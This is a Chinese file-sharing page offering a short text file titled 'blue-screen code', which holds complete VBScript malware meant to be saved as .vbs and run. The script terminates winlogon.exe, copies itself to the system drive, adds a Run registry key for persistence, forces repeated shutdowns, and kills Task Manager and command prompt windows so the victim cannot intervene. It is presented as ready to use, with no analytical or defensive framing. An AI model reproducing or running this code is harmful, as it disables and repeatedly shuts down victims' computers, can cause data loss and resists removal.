蓝屏代码

时间:2021-07-31 08:27:56
【文件属性】:
文件名称:蓝屏代码
文件大小:943B
文件格式:TXT
更新时间:2021-07-31 08:27:56
编码 自行转vbs 代码:for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ if Ucase(ps.name)=Ucase("winlogon.exe") then ps.terminate end if next Set ws=CreateObject("WScript.Shell") set fs=createobject("scripting.filesystemobject") dim a1,a2,a3,thn,i thn=wscript.scriptfullname a1=fs.getparentfoldername(fs.GetSpecialFolder(0)) fs.copyfile thn,a1&"\admin123.vbs",true do while i<10 i=i+1 ws.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin","C:\admin123.vbs" loop ws.run "shutdown -s -f -t 60" do wscript.sleep 500 if ws.appactivate("Windows 任务管理器")=true then ws.run "taskkill /f /im Taskmgr.exe" end if if ws.appactivate("命令提示符")=true then ws.run "taskkill /f /im cmd.exe" end if if ws.appactivate("C:\WINDOWS\system32\cmd.exe")=true then ws.run "taskkill /f /im cmd.exe" end if if ws.appactivate("系统关机")=false then ws.run "shutdown -s -f -t 30" end if loop

网友评论